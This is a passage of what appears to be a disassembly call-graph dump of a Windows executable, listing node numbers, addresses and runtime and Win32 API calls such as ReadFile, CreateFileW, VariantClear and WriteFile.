85635->85638 85636->85640 85641 417f77 __wcsnicmp 46 API calls 85637->85641 85642 41daa4 85638->85642 85639->85630 85639->85640 85643 41dae1 85639->85643 85645 41db1b 85639->85645 85640->85591 85641->85642 85644 417f25 __wcsnicmp 10 API calls 85642->85644 85643->85630 85648 41daec ReadFile 85643->85648 85644->85640 85647 416b04 __malloc_crt 46 API calls 85645->85647 85649 41db31 85647->85649 85650 41dc17 85648->85650 85651 41df8f GetLastError 85648->85651 85654 41db59 85649->85654 85655 41db3b 85649->85655 85650->85651 85658 41dc2b 85650->85658 85652 41de16 85651->85652 85653 41df9c 85651->85653 85662 417f9d __dosmaperr 46 API calls 85652->85662 85683 41dd9b 85652->85683 85656 417f77 __wcsnicmp 46 API calls 85653->85656 85659 420494 __lseeki64_nolock 48 API calls 85654->85659 85657 417f77 __wcsnicmp 46 API calls 85655->85657 85660 41dfa1 85656->85660 85661 41db40 85657->85661 85666 41dc47 85658->85666 85667 41de5b 85658->85667 85658->85683 85663 41db67 85659->85663 85664 417f8a __close 46 API calls 85660->85664 85665 417f8a __close 46 API calls 85661->85665 85662->85683 85663->85648 85664->85683 85665->85640 85669 41dcab ReadFile 85666->85669 85675 41dd28 85666->85675 85670 41ded0 ReadFile 85667->85670 85667->85683 85668 413748 _free 46 API calls 85668->85640 85673 41dcc9 GetLastError 85669->85673 85678 41dcd3 85669->85678 85671 41deef GetLastError 85670->85671 85679 41def9 85670->85679 85671->85667 85671->85679 85672 41ddec MultiByteToWideChar 85674 41de10 GetLastError 85672->85674 85672->85683 85673->85666 85673->85678 85674->85652 85676 41dda3 85675->85676 85677 41dd96 85675->85677 85675->85683 85684 41dd60 85675->85684 85676->85684 85685 41ddda 85676->85685 85680 417f77 __wcsnicmp 46 API calls 85677->85680 85678->85666 85681 420494 __lseeki64_nolock 48 API calls 85678->85681 85679->85667 85682 420494 __lseeki64_nolock 48 API calls 85679->85682 85680->85683 85681->85678 85682->85679 85683->85640 85683->85668 85684->85672 85686 420494 __lseeki64_nolock 48 API calls 85685->85686 85687 41dde9 85686->85687 85687->85672 85688->85571 85689->85579 85690->85573 85691->85590 85692->85579 85693->85582 85694->85590 85695->85592 85696->85591 85697->85579 85699 416b04 __malloc_crt 46 API calls 85698->85699 85700 420618 85699->85700 85700->85601 85701->85598 85702->85606 85706 4148b3 GetSystemTimeAsFileTime __aulldiv 85703->85706 85705 442c6b 85705->85212 85706->85705 85707->85219 85708->85225 85709->85225 85714 45272f __tzset_nolock _wcscpy 85710->85714 85711 414d04 61 API calls __fread_nolock 85711->85714 85712 4528a4 85712->85134 85712->85135 85713 44afef GetSystemTimeAsFileTime 85713->85714 85714->85711 85714->85712 85714->85713 85715 4150d1 81 API calls _fseek 85714->85715 85715->85714 85717 44b1bc 85716->85717 85718 44b1ca 85716->85718 85719 4149c2 116 API calls 85717->85719 85720 44b1e1 85718->85720 85721 4149c2 116 API calls 85718->85721 85722 44b1d8 85718->85722 85719->85718 85751 4321a4 85720->85751 85723 44b2db 85721->85723 85722->85162 85723->85720 85725 44b2e9 85723->85725 85727 44b2f6 85725->85727 85730 414a46 __fcloseall 82 API calls 85725->85730 85726 44b224 85728 44b253 85726->85728 85729 44b228 85726->85729 85727->85162 85755 43213d 85728->85755 85732 44b235 85729->85732 85735 414a46 __fcloseall 82 API calls 85729->85735 85730->85727 85733 44b245 85732->85733 85736 414a46 __fcloseall 82 API calls 85732->85736 85733->85162 85734 44b25a 85737 44b260 85734->85737 85738 44b289 85734->85738 85735->85732 85736->85733 85740 44b26d 85737->85740 85742 414a46 __fcloseall 82 API calls 85737->85742 85765 44b0bf 87 API calls 85738->85765 85743 44b27d 85740->85743 85745 414a46 __fcloseall 82 API calls 85740->85745 85741 44b28f 85766 4320f8 46 API calls _free 85741->85766 85742->85740 85743->85162 85745->85743 85746 44b295 85747 44b2a2 85746->85747 85748 414a46 __fcloseall 82 API calls 85746->85748 85749 44b2b2 85747->85749 85750 414a46 __fcloseall 82 API calls 85747->85750 85748->85747 85749->85162 85750->85749 85752 4321cb 85751->85752 85754 4321b4 __tzset_nolock _memmove 85751->85754 85753 414d04 __fread_nolock 61 API calls 85752->85753 85753->85754 85754->85726 85756 4135bb _malloc 46 API calls 85755->85756 85757 432150 85756->85757 85758 4135bb _malloc 46 API calls 85757->85758 85759 432162 85758->85759 85760 4135bb _malloc 46 API calls 85759->85760 85761 432174 85760->85761 85763 432189 85761->85763 85767 4320f8 46 API calls _free 85761->85767 85763->85734 85764 432198 85764->85734 85765->85741 85766->85746 85767->85764 85768->85065 85769->85067 85770->85085 85771->85085 85772->85085 85773->85076 85774->85085 85775->85085 85776->85089 85777->85098 85778->85099 85779->85099 85829 410160 85780->85829 85782 41012f GetFullPathNameW 85783 410147 moneypunct 85782->85783 85783->84919 85785 4102cb SHGetDesktopFolder 85784->85785 85788 410333 _wcsncpy 85784->85788 85786 4102e0 _wcsncpy 85785->85786 85785->85788 85787 41031c SHGetPathFromIDListW 85786->85787 85786->85788 85787->85788 85788->84922 85790 4101bb 85789->85790 85795 425f4a 85789->85795 85791 410160 52 API calls 85790->85791 85792 4101c7 85791->85792 85833 410200 52 API calls 2 library calls 85792->85833 85793 4114ab __wcsicoll 58 API calls 85793->85795 85795->85793 85797 425f6e 85795->85797 85796 4101d6 85834 410200 52 API calls 2 library calls 85796->85834 85797->84925 85799 4101e9 85799->84925 85801 40f760 126 API calls 85800->85801 85802 40f584 85801->85802 85803 429335 85802->85803 85804 40f58c 85802->85804 85807 4528bd 118 API calls 85803->85807 85805 40f598 85804->85805 85806 429358 85804->85806 85859 4033c0 113 API calls 7 library calls 85805->85859 85860 434034 86 API calls _wprintf 85806->85860 85809 42934b 85807->85809 85812 429373 85809->85812 85813 42934f 85809->85813 85811 40f5b4 85811->84923 85816 4115d7 52 API calls 85812->85816 85815 431e58 82 API calls 85813->85815 85814 429369 85814->85812 85815->85806 85828 4293c5 moneypunct 85816->85828 85817 42959c 85818 413748 _free 46 API calls 85817->85818 85819 4295a5 85818->85819 85820 431e58 82 API calls 85819->85820 85821 4295b1 85820->85821 85825 401b10 52 API calls 85825->85828 85828->85817 85828->85825 85835 444af8 85828->85835 85838 44b41c 85828->85838 85845 402780 85828->85845 85853 4022d0 85828->85853 85861 44c7dd 64 API calls 3 library calls 85828->85861 85830 410167 _wcslen 85829->85830 85831 4115d7 52 API calls 85830->85831 85832 41017e _wcscpy 85831->85832 85832->85782 85833->85796 85834->85799 85836 4115d7 52 API calls 85835->85836 85837 444b27 _memmove 85836->85837 85837->85828 85839 44b429 85838->85839 85840 4115d7 52 API calls 85839->85840 85841 44b440 85840->85841 85842 44b45e 85841->85842 85843 401b10 52 API calls 85841->85843 85842->85828 85844 44b453 85843->85844 85844->85828 85846 402827 85845->85846 85849 402790 moneypunct _memmove 85845->85849 85848 4115d7 52 API calls 85846->85848 85847 4115d7 52 API calls 85850 402797 85847->85850 85848->85849 85849->85847 85851 4027bd 85850->85851 85852 4115d7 52 API calls 85850->85852 85851->85828 85852->85851 85854 4022e0 85853->85854 85857 40239d 85853->85857 85855 4115d7 52 API calls 85854->85855 85854->85857 85858 402320 moneypunct 85854->85858 85855->85858 85856 4115d7 52 API calls 85856->85858 85857->85828 85858->85856 85858->85857 85859->85811 85860->85814 85861->85828 85863 402417 85862->85863 85867 402539 moneypunct 85862->85867 85864 4115d7 52 API calls 85863->85864 85863->85867 85865 402443 85864->85865 85866 4115d7 52 API calls 85865->85866 85869 4024b4 85866->85869 85867->84929 85869->85867 85870 4022d0 52 API calls 85869->85870 85891 402880 95 API calls 2 library calls 85869->85891 85870->85869 85875 401566 85871->85875 85872 401794 85892 40e9a0 90 API calls 85872->85892 85875->85872 85876 4010a0 52 API calls 85875->85876 85877 40167a 85875->85877 85876->85875 85878 4017c0 85877->85878 85893 45e737 90 API calls 3 library calls 85877->85893 85878->84931 85880 40bc70 52 API calls 85879->85880 85889 40d451 85880->85889 85881 40d50f 85896 410600 52 API calls 85881->85896 85883 427c01 85897 45e737 90 API calls 3 library calls 85883->85897 85884 40e0a0 52 API calls 85884->85889 85886 401b10 52 API calls 85886->85889 85887 40d519 85887->84934 85889->85881 85889->85883 85889->85884 85889->85886 85889->85887 85894 40f310 53 API calls 85889->85894 85895 40d860 91 API calls 85889->85895 85891->85869 85892->85877 85893->85878 85894->85889 85895->85889 85896->85887 85897->85887 85898->84947 85899->84948 85901 42c5fe 85900->85901 85916 4091c6 85900->85916 85902 40bc70 52 API calls 85901->85902 85901->85916 85903 42c64e InterlockedIncrement 85902->85903 85904 42c665 85903->85904 85909 42c697 85903->85909 85906 42c672 InterlockedDecrement Sleep InterlockedIncrement 85904->85906 85904->85909 85905 42c737 InterlockedDecrement 85907 42c74a 85905->85907 85906->85904 85906->85909 85910 408f40 VariantClear 85907->85910 85908 42c731 85908->85905 85909->85905 85909->85908 86193 408e80 85909->86193 85912 42c752 85910->85912 86202 410c60 VariantClear moneypunct 85912->86202 85916->85011 85917 42c6db 85918 402160 52 API calls 85917->85918 85919 42c6e5 85918->85919 86198 45340c 85 API calls 85919->86198 85921 42c6f1 86199 40d200 52 API calls 2 library calls 85921->86199 85923 42c6fb 86200 465124 53 API calls 85923->86200 85925 42c715 85926 42c76a 85925->85926 85927 42c719 85925->85927 85929 401b10 52 API calls 85926->85929 86201 46fe32 VariantClear 85927->86201 85930 42c77e 85929->85930 85931 401980 53 API calls 85930->85931 85936 42c796 85931->85936 85932 42c812 86204 46fe32 VariantClear 85932->86204 85934 42c82a InterlockedDecrement 86205 46ff07 54 API calls 85934->86205 85936->85932 85938 42c864 85936->85938 86203 40ba10 52 API calls 2 library calls 85936->86203 85937 42c849 85940 42c9ec 85937->85940 85946 408f40 VariantClear 85937->85946 85949 402780 52 API calls 85937->85949 85955 401980 53 API calls 85937->85955 86208 40a780 85937->86208 86206 45e737 90 API calls 3 library calls 85938->86206 86249 47d33e 331 API calls 85940->86249 85943 42c9fe 86250 46feb1 VariantClear VariantClear 85943->86250 85945 42c874 85948 408f40 VariantClear 85945->85948 85957 42ca59 85945->85957 85946->85937 85947 42ca08 85950 401b10 52 API calls 85947->85950 85951 42c891 85948->85951 85949->85937 85952 42ca15 85950->85952 86207 410c60 VariantClear moneypunct 85951->86207 85953 40c2c0 52 API calls 85952->85953 85953->85945 85955->85937 85957->85957 85959 40afc4 85958->85959 85960 40b156 85958->85960 85961 40afd5 85959->85961 85962 42d1e3 85959->85962 86260 45e737 90 API calls 3 library calls 85960->86260 85965 40a780 194 API calls 85961->85965 85983 40b11a moneypunct 85961->85983 86261 45e737 90 API calls 3 library calls 85962->86261 85968 40b00a 85965->85968 85966 40b143 85966->85011 85967 42d1f8 85971 408f40 VariantClear 85967->85971 85968->85967 85972 40b012 85968->85972 85970 42d4db 85970->85970 85971->85966 85973 40b04a 85972->85973 85975 42d231 VariantClear 85972->85975 85976 40b094 moneypunct 85972->85976 85982 40b05c moneypunct 85973->85982 86262 40e270 VariantClear moneypunct 85973->86262 85974 40b108 85974->85983 86263 40e270 VariantClear moneypunct 85974->86263 85975->85982 85976->85974 85978 42d425 moneypunct 85976->85978 85977 42d45a VariantClear 85977->85983 85978->85977 85978->85983 85980 4115d7 52 API calls 85980->85976 85982->85976 85982->85980 85983->85966 86264 45e737 90 API calls 3 library calls 85983->86264 85985 408fff 85984->85985 85996 40900d 85984->85996 86265 403ea0 52 API calls __cinit 85985->86265 85988 42c3f6 86268 45e737 90 API calls 3 library calls 85988->86268 85990 42c44a 86270 45e737 90 API calls 3 library calls 85990->86270 85991 40a780 194 API calls 85991->85996 85992 42c47b 86271 451b42 61 API calls 85992->86271 85996->85988 85996->85990 85996->85991 85996->85992 85997 42c4cb 85996->85997 85998 42c564 85996->85998 85999 42c548 85996->85999 86003 409112 85996->86003 86006 4090df 85996->86006 86008 42c528 85996->86008 86010 4090ea 85996->86010 86018 4090f2 moneypunct 85996->86018 86267 4534e3 52 API calls 85996->86267 86269 40c4e0 194 API calls 85996->86269 86273 47faae 233 API calls 85997->86273 86000 408f40 VariantClear 85998->86000 86276 45e737 90 API calls 3 library calls 85999->86276 86000->86018 86001 42c491 86001->86018 86272 45e737 90 API calls 3 library calls 86001->86272 86003->85999 86013 40912b 86003->86013 86004 42c4da 86004->86018 86274 45e737 90 API calls 3 library calls 86004->86274 86006->86010 86011 408e80 VariantClear 86006->86011 86275 45e737 90 API calls 3 library calls 86008->86275 86014 408f40 VariantClear 86010->86014 86011->86010 86013->86018 86266 403e10 53 API calls 86013->86266 86014->86018 86016 40914b 86017 408f40 VariantClear 86016->86017 86017->86018 86018->85011 86277 408d90 86019->86277 86021 429778 86304 410c60 VariantClear moneypunct 86021->86304 86023 408cf9 86023->86021 86025 42976c 86023->86025 86027 408d2d 86023->86027 86024 429780 86303 45e737 90 API calls 3 library calls 86025->86303 86293 403d10 86027->86293 86030 408d71 moneypunct 86030->85011 86031 408f40 VariantClear 86032 408d45 moneypunct 86031->86032 86032->86030 86032->86031 86035 425c87 86033->86035 86037 40d15f 86033->86037 86034 425cc7 86035->86034 86036 425ca1 TranslateAcceleratorW 86035->86036 86036->86037 86037->85011 86039 42602f 86038->86039 86040 40d17f 86038->86040 86039->85011 86041 40d18c 86040->86041 86042 42608e IsDialogMessageW 86040->86042 86602 430c46 GetClassLongW 86040->86602 86041->85011 86042->86040 86042->86041 86045 4096c6 _wcslen 86044->86045 86046 4115d7 52 API calls 86045->86046 86108 40a70c moneypunct _memmove 86045->86108 86047 4096fa _memmove 86046->86047 86049 4115d7 52 API calls 86047->86049 86048 4013a0 52 API calls 86050 4297aa 86048->86050 86051 40971b 86049->86051 86053 4115d7 52 API calls 86050->86053 86052 409749 CharUpperBuffW 86051->86052 86055 40976a moneypunct 86051->86055 86051->86108 86052->86055 86094 4297d1 _memmove 86053->86094 86102 4097e5 moneypunct 86055->86102 86604 47dcbb 196 API calls 86055->86604 86057 408f40 VariantClear 86058 42ae92 86057->86058 86631 410c60 VariantClear moneypunct 86058->86631 86060 42aea4 86061 409aa2 86063 4115d7 52 API calls 86061->86063 86068 409afe 86061->86068 86061->86094 86062 40a689 86065 4115d7 52 API calls 86062->86065 86063->86068 86064 4115d7 52 API calls 86064->86102 86081 40a6af moneypunct _memmove 86065->86081 86066 409b2a 86070 429dbe 86066->86070 86131 409b4d moneypunct _memmove 86066->86131 86612 40b400 VariantClear VariantClear moneypunct 86066->86612 86067 40c2c0 52 API calls 86067->86102 86068->86066 86069 4115d7 52 API calls 86068->86069 86071 429d31 86069->86071 86076 429dd3 86070->86076 86613 40b400 VariantClear VariantClear moneypunct 86070->86613 86075 429d42 86071->86075 86609 44a801 52 API calls 86071->86609 86072 429a46 VariantClear 86072->86102 86073 409fd2 86078 40a045 86073->86078 86133 42a3f5 86073->86133 86085 40e0a0 52 API calls 86075->86085 86076->86131 86614 40e1c0 VariantClear moneypunct 86076->86614 86083 4115d7 52 API calls 86078->86083 86079 408f40 VariantClear 86079->86102 86088 4115d7 52 API calls 86081->86088 86089 40a04c 86083->86089 86090 429d57 86085->86090 86088->86108 86093 40a0a7 86089->86093 86097 4091e0 317 API calls 86089->86097 86610 453443 52 API calls 86090->86610 86092 42a42f 86618 45e737 90 API calls 3 library calls 86092->86618 86116 40a0af 86093->86116 86619 40c790 VariantClear moneypunct 86093->86619 86630 45e737 90 API calls 3 library calls 86094->86630 86095 4299d9 86099 408f40 VariantClear 86095->86099 86097->86093 86098 429abd 86098->85011 86103 4299e2 86099->86103 86100 429d88 86611 453443 52 API calls 86100->86611 86102->86061 86102->86062 86102->86064 86102->86067 86102->86072 86102->86079 86102->86081 86102->86094 86102->86095 86102->86098 86106 42a452 86102->86106 86110 40a780 194 API calls 86102->86110 86605 40c4e0 194 API calls 86102->86605 86607 40ba10 52 API calls 2 library calls 86102->86607 86608 40e270 VariantClear moneypunct 86102->86608 86606 410c60 VariantClear moneypunct 86103->86606 86106->86057 86108->86048 86110->86102 86111 402780 52 API calls 86111->86131 86113 408f40 VariantClear 86144 40a162 moneypunct _memmove 86113->86144 86114 4115d7 52 API calls 86114->86131 86115 41130a 51 API calls __cinit 86115->86131 86117 40a11b 86116->86117 86119 42a4b4 VariantClear 86116->86119 86116->86144 86123 40a12d moneypunct 86117->86123 86620 40e270 VariantClear moneypunct 86117->86620 86118 40a780 194 API calls 86118->86131 86119->86123 86120 401980 53 API calls 86120->86131 86121 408e80 VariantClear 86121->86131 86124 4115d7 52 API calls 86123->86124 86123->86144 86124->86144 86125 408e80 VariantClear 86125->86144 86127 44a801 52 API calls 86127->86131 86128 42a74d VariantClear 86128->86144 86129 40a368 86132 42aad4 86129->86132 86139 40a397 86129->86139 86130 40e270 VariantClear 86130->86144 86131->86073 86131->86092 86131->86108 86131->86111 86131->86114 86131->86115 86131->86118 86131->86120 86131->86121 86131->86127 86131->86133 86137 409c95 86131->86137 86615 45f508 52 API calls 86131->86615 86616 403e10 53 API calls 86131->86616 86623 46fe90 VariantClear VariantClear moneypunct 86132->86623 86617 47390f VariantClear 86133->86617 86134 42a7e4 VariantClear 86134->86144 86135 42a886 VariantClear 86135->86144 86137->85011 86138 40a3ce 86151 40a3d9 moneypunct 86138->86151 86624 40b400 VariantClear VariantClear moneypunct 86138->86624 86139->86138 86164 40a42c moneypunct 86139->86164 86603 40b400 VariantClear VariantClear moneypunct 86139->86603 86142 42abaf 86147 42abd4 VariantClear 86142->86147 86158 40a4ee moneypunct 86142->86158 86143 4115d7 52 API calls 86143->86144 86144->86113 86144->86125 86144->86128 86144->86129 86144->86130 86144->86132 86144->86134 86144->86135 86144->86143 86146 4115d7 52 API calls 86144->86146 86621 470870 52 API calls 86144->86621 86622 44ccf1 VariantClear moneypunct 86144->86622 86145 40a4dc 86145->86158 86626 40e270 VariantClear moneypunct 86145->86626 86148 42a5a6 VariantInit VariantCopy 86146->86148 86147->86158 86148->86144 86153 42a5c6 VariantClear 86148->86153 86149 42ac4f 86157 42ac79 VariantClear 86149->86157 86162 40a546 moneypunct 86149->86162 86152 40a41a 86151->86152 86155 42ab44 VariantClear 86151->86155 86151->86164 86152->86164 86625 40e270 VariantClear moneypunct 86152->86625 86153->86144 86154 40a534 86154->86162 86627 40e270 VariantClear moneypunct 86154->86627 86155->86164 86157->86162 86158->86149 86158->86154 86159 42ad28 86165 42ad4e VariantClear 86159->86165 86170 40a583 moneypunct 86159->86170 86162->86159 86163 40a571 86162->86163 86163->86170 86628 40e270 VariantClear moneypunct 86163->86628 86164->86142 86164->86145 86165->86170 86167 40a650 moneypunct 86167->85011 86168 42ae0e VariantClear 86168->86170 86170->86167 86170->86168 86629 40e270 VariantClear moneypunct 86170->86629 86171->85011 86172->84958 86173->84963 86174->85011 86175->85011 86176->85011 86177->85011 86178->85015 86179->85015 86180->85015 86181->85015 86182->85015 86183->85015 86184->85015 86186 403cdf 86185->86186 86187 408f40 VariantClear 86186->86187 86188 403ce7 86187->86188 86188->85004 86189->85015 86190->85015 86191->85011 86192->84955 86194 408e88 86193->86194 86196 408e94 86193->86196 86195 408f40 VariantClear 86194->86195 86195->86196 86197 45340c 85 API calls 86196->86197 86197->85917 86198->85921 86199->85923 86200->85925 86201->85908 86202->85916 86203->85936 86204->85934 86205->85937 86206->85945 86207->85916 86209 40a7a6 86208->86209 86210 40ae8c 86208->86210 86212 4115d7 52 API calls 86209->86212 86251 41130a 51 API calls __cinit 86210->86251 86229 40a7c6 moneypunct _memmove 86212->86229 86213 40a86d 86214 40abd1 86213->86214 86232 40a878 moneypunct 86213->86232 86256 45e737 90 API calls 3 library calls 86214->86256 86215 401b10 52 API calls 86215->86229 86217 42b791 VariantClear 86217->86229 86218 408e80 VariantClear 86218->86229 86219 42ba2d VariantClear 86219->86229 86220 408f40 VariantClear 86220->86232 86221 42b459 VariantClear 86221->86229 86222 40a884 moneypunct 86222->85937 86224 40bc10 53 API calls 86224->86229 86225 408cc0 187 API calls 86225->86229 86226 42b6f6 VariantClear 86226->86229 86227 4530c9 VariantClear 86227->86229 86228 42bc5b 86228->85937 86229->86213 86229->86214 86229->86215 86229->86217 86229->86218 86229->86219 86229->86221 86229->86224 86229->86225 86229->86226 86229->86227 86230 42bbf5 86229->86230 86231 42bb6a 86229->86231 86233 40e270 VariantClear 86229->86233 86234 4115d7 52 API calls 86229->86234 86235 40b5f0 89 API calls 86229->86235 86239 408f40 VariantClear 86229->86239 86241 4115d7 52 API calls 86229->86241 86244 42bc37 86229->86244 86252 45308a 53 API calls 86229->86252 86253 470870 52 API calls 86229->86253 86254 457f66 87 API calls __write_nolock 86229->86254 86255 472f47 127 API calls 86229->86255 86257 45e737 90 API calls 3 library calls 86230->86257 86259 44b92d VariantClear 86231->86259 86232->86220 86232->86222 86233->86229 86237 42b5b3 VariantInit VariantCopy 86234->86237 86235->86229 86237->86229 86240 42b5d7 VariantClear 86237->86240 86239->86229 86240->86229 86241->86229 86258 45e737 90 API calls 3 library calls 86244->86258 86247 42bc48 86247->86231 86248 408f40 VariantClear 86247->86248 86248->86231 86249->85943 86250->85947 86251->86229 86252->86229 86253->86229 86254->86229 86255->86229 86256->86231 86257->86231 86258->86247 86259->86228 86260->85962 86261->85967 86262->85982 86263->85983 86264->85970 86265->85996 86266->86016 86267->85996 86268->86018 86269->85996 86270->86018 86271->86001 86272->86018 86273->86004 86274->86018 86275->86018 86276->85998 86278 4289d2 86277->86278 86279 408db3 86277->86279 86307 45e737 90 API calls 3 library calls 86278->86307 86305 40bec0 90 API calls 86279->86305 86282 4289e5 86308 45e737 90 API calls 3 library calls 86282->86308 86283 408dc9 86283->86282 86286 428a05 86283->86286 86288 40a780 194 API calls 86283->86288 86289 408e5a 86283->86289 86290 408e64 86283->86290 86292 408f40 VariantClear 86283->86292 86306 40ba10 52 API calls 2 library calls 86283->86306 86287 408f40 VariantClear 86286->86287 86287->86289 86288->86283 86289->86023 86291 408f40 VariantClear 86290->86291 86291->86289 86292->86283 86294 408f40 VariantClear 86293->86294 86295 403d20 86294->86295 86296 403cd0 VariantClear 86295->86296 86297 403d4d 86296->86297 86309 45e17d 86297->86309 86319 4755ad 86297->86319 86322 467897 86297->86322 86366 46e91c 86297->86366 86298 403d76 86298->86021 86298->86032 86303->86021 86304->86024 86305->86283 86306->86283 86307->86282 86308->86286 86310 45e198 86309->86310 86311 45e19c 86310->86311 86312 45e1b8 86310->86312 86315 408f40 VariantClear 86311->86315 86313 45e1cc 86312->86313 86314 45e1db FindClose 86312->86314 86316 45e1d9 moneypunct 86313->86316 86369 44ae3e 86313->86369 86314->86316 86317 45e1a4 86315->86317 86316->86298 86317->86298 86384 475077 86319->86384 86321 4755c0 86321->86298 86323 4678bb 86322->86323 86355 467954 86323->86355 86502 45340c 85 API calls 86323->86502 86324 4115d7 52 API calls 86325 467989 86324->86325 86327 467995 86325->86327 86506 40da60 53 API calls 86325->86506 86331 4533eb 85 API calls 86327->86331 86328 4678f6 86330 413a0e __wsplitpath 46 API calls 86328->86330 86332 4678fc 86330->86332 86333 4679b7 86331->86333 86334 401b10 52 API calls 86332->86334 86490 40de40 86333->86490 86336 46790c 86334->86336 86503 40d200 52 API calls 2 library calls 86336->86503 86339 467917 86339->86355 86504 4339fa GetFileAttributesW FindFirstFileW FindClose 86339->86504 86340 4679c7 GetLastError 86342 403cd0 VariantClear 86340->86342 86341 467a05 86345 467a2c 86341->86345 86346 467a4b 86341->86346 86349 467928 86353 46792f 86349->86353 86349->86355 86505 4335cd 56 API calls 3 library calls 86353->86505 86355->86324 86356 467964 86355->86356 86356->86298 86362 467939 86362->86355 86364 408f40 VariantClear 86362->86364 86365 467947 86364->86365 86365->86355 86520 46e785 86366->86520 86368 46e92f 86368->86298 86370 44ae4b moneypunct 86369->86370 86372 443fdf 86369->86372 86370->86316 86377 40da20 86372->86377 86374 443feb 86381 4340db 86374->86381 86376 444001 86376->86370 86378 40da37 86377->86378 86379 40da29 86377->86379 86378->86379 86380 40da3c CloseHandle 86378->86380 86379->86374 86380->86374 86382 40da20 CloseHandle 86381->86382 86383 4340e7 moneypunct 86382->86383 86383->86376 86437 4533eb 86384->86437 86387 4750ee 86389 408f40 VariantClear 86387->86389 86388 475129 86441 4646e0 86388->86441 86397 4750f5 86389->86397 86391 47515e 86392 475162 86391->86392 86417 47518e 86391->86417 86393 408f40 VariantClear 86392->86393 86411 475169 86393->86411 86394 475357 86395 475365 86394->86395 86396 4754ea 86394->86396 86475 44b3ac 57 API calls 86395->86475 86481 464812 92 API calls 86396->86481 86397->86321 86401 4754fc 86402 475374 86401->86402 86403 475508 86401->86403 86454 430d31 86402->86454 86405 408f40 VariantClear 86403->86405 86404 4533eb 85 API calls 86404->86417 86407 47550f 86405->86407 86407->86411 86408 475388 86461 4577e9 86408->86461 86411->86321 86413 475480 86414 408f40 VariantClear 86413->86414 86414->86411 86417->86394 86417->86404 86417->86413 86423 4754b5 86417->86423 86473 436299 52 API calls 2 library calls 86417->86473 86474 463ad5 64 API calls __wcsicoll 86417->86474 86425 408f40 VariantClear 86423->86425 86425->86411 86438 453404 86437->86438 86439 4533f8 86437->86439 86438->86387 86438->86388 86439->86438 86484 4531b1 85 API calls 5 library calls 86439->86484 86485 4536f7 53 API calls 86441->86485 86443 4646fc 86486 4426cd 59 API calls _wcslen 86443->86486 86445 464711 86447 40bc70 52 API calls 86445->86447 86453 46474b 86445->86453 86448 46472c 86447->86448 86487 461465 52 API calls _memmove 86448->86487 86450 464741 86451 40c600 52 API calls 86450->86451 86451->86453 86452 464793 86452->86391 86453->86452 86488 463ad5 64 API calls __wcsicoll 86453->86488 86455 430db2 86454->86455 86456 430d54 86454->86456 86455->86408 86457 4115d7 52 API calls 86456->86457 86460 430d74 86457->86460 86473->86417 86474->86417 86475->86402 86481->86401 86484->86438 86485->86443 86486->86445 86487->86450 86488->86452 86491 40da20 CloseHandle 86490->86491 86492 40de4e 86491->86492 86508 40f110 86492->86508 86495 4264fa 86497 40de84 86517 40e080 SetFilePointerEx SetFilePointerEx 86497->86517 86499 40de8b 86518 40f160 SetFilePointerEx SetFilePointerEx WriteFile 86499->86518 86501 40de90 86501->86340 86501->86341 86502->86328 86503->86339 86504->86349 86505->86362 86506->86327 86509 40f125 CreateFileW 86508->86509 86510 42630c 86508->86510 86512 40de74 86509->86512 86511 426311 CreateFileW 86510->86511 86510->86512 86511->86512 86513 426337 86511->86513 86512->86495 86516 40dea0 55 API calls moneypunct 86512->86516 86519 40df90 SetFilePointerEx SetFilePointerEx 86513->86519 86515 426342 86515->86512 86516->86497 86517->86499 86518->86501 86519->86515 86521 46e7a2 86520->86521 86522 4115d7 52 API calls 86521->86522 86525 46e802 86521->86525 86523 46e7ad 86522->86523 86524 46e7b9 86523->86524 86568 40da60 53 API calls 86523->86568 86530 4533eb 85 API calls 86524->86530 86526 46e7e5 86525->86526 86533 46e82f 86525->86533 86527 408f40 VariantClear 86526->86527 86529 46e7ea 86527->86529 86529->86368 86531 46e7ca 86530->86531 86534 40de40 60 API calls 86531->86534 86532 46e8b5 86561 4680ed 86532->86561 86533->86532 86536 46e845 86533->86536 86537 46e7d7 86534->86537 86538 4533eb 85 API calls 86536->86538 86537->86533 86539 46e7db 86537->86539 86546 46e84b 86538->86546 86539->86526 86542 44ae3e CloseHandle 86539->86542 86540 46e8bb 86565 443fbe 86540->86565 86541 46e87a 86569 4689f4 59 API calls 86541->86569 86542->86526 86543 46e883 86547 4013c0 52 API calls 86543->86547 86546->86541 86546->86543 86549 46e88f 86547->86549 86550 40e0a0 52 API calls 86549->86550 86552 46e899 86550->86552 86551 408f40 VariantClear 86559 46e881 86551->86559 86570 40d200 52 API calls 2 library calls 86552->86570 86554 46e911 86554->86368 86555 46e8a5 86571 4689f4 59 API calls 86555->86571 86556 40da20 CloseHandle 86558 46e903 86556->86558 86560 44ae3e CloseHandle 86558->86560 86559->86554 86559->86556 86560->86554 86562 468100 86561->86562 86563 4680fa 86561->86563 86562->86540 86572 467ac4 86563->86572 86595 443e36 86565->86595 86567 443fd3 86567->86551 86567->86559 86568->86524 86569->86559 86570->86555 86571->86559 86573 467adc 86572->86573 86588 467bb8 86572->86588 86574 467c1d 86573->86574 86575 467c16 86573->86575 86576 467b90 86573->86576 86580 467aed 86573->86580 86578 4115d7 52 API calls 86574->86578 86594 40e270 VariantClear moneypunct 86575->86594 86579 4115d7 52 API calls 86576->86579 86582 467b75 _memmove 86578->86582 86579->86582 86581 467b28 moneypunct 86580->86581 86589 4115d7 52 API calls 86580->86589 86581->86574 86581->86582 86584 467b55 86581->86584 86583 4115d7 52 API calls 86582->86583 86583->86588 86585 4115d7 52 API calls 86584->86585 86586 467b5b 86585->86586 86592 442ee0 52 API calls 86586->86592 86588->86562 86589->86581 86590 467b6b 86593 45f645 54 API calls moneypunct 86590->86593 86592->86590 86593->86582 86594->86574 86598 443e19 86595->86598 86599 443e26 86598->86599 86600 443e32 WriteFile 86598->86600 86601 443db4 SetFilePointerEx SetFilePointerEx 86599->86601 86600->86567 86601->86600 86602->86040 86603->86138 86604->86055 86605->86102 86606->86167 86607->86102 86608->86102 86609->86075 86610->86100 86611->86066 86612->86070 86613->86076 86614->86131 86615->86131 86616->86131 86617->86092 86618->86106 86619->86093 86620->86123 86621->86144 86622->86144 86623->86138 86624->86151 86625->86164 86626->86158 86627->86162 86628->86170 86629->86170 86630->86106 86631->86060 86632 42d154 86636 480a8d 86632->86636 86634 42d161 86635 480a8d 194 API calls 86634->86635 86635->86634 86637 480ae4 86636->86637 86638 480b26 86636->86638 86640 480aeb 86637->86640 86641 480b15 86637->86641 86639 40bc70 52 API calls 86638->86639 86663 480b2e 86639->86663 86643 480aee 86640->86643 86644 480b04 86640->86644 86669 4805bf 194 API calls 86641->86669 86643->86638 86645 480af3 86643->86645 